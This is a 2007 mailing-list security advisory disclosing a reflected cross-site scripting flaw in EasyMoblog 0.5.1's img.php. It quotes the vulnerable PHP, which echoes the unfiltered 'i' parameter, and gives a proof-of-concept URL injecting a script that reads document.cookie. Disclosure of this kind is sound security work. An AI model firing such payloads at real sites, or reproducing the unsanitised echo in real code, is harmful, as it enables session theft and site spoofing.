[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Xss Vulnerability in EasyMoblog 0.5.1
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Xss Vulnerability in EasyMoblog 0.5.1
- From: "tal argoni" <talargoni@xxxxxxxxx>
- Date: Thu, 1 Feb 2007 20:15:58 +0200
Original Advisory Can Be Found at
www.zion-security.com -> [advisories].
--
Thanks in advance,
Tal Argoni,CEH
www.zion-security.com
·= Security Advisory =·
Issue: Cross Site Scripting (XSS) Vulnerability in "img.php" by Umberto Caldera.
Discovered Date: 30/01/2007
Author: Tal Argoni [talargoni at gmail d0t com]
Product Vendor: http://sourceforge.net/project/showfiles.php?group_id=88633
Ver: easymoblog-0.5.1
Details:
EasyMoblog is prone to a Cross Site Scripting Vulnerability.
The vulnerability exists in "img.php" file, caused by the lack of Input
Validation/Filtering of quotation and HTML characters in the
GET parameter "i".
Contents of "img.php"
---------------------------------
...
<?php
$img_name = $_GET['i'];
?>
...
<body>
<img src="img/posts/<?php echo $img_name; ?>" border="0" alt="" />
</body>
...
Exploitation URL:
http://www.example.com/easymoblog/img.php?i="><script>alert(document.cookie);</script><img
src=
Successful exploitation may allow execution of script code. This could also be
exploited to
spoof the entire website's content,
create fake login menu's for all the platform's users, commit Denial Of Service
attacks and more...
Proof Of Concept:
http://www.example.com/easymoblog/img.php?i="><script>alert(document.cookie);</script><img
src=
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/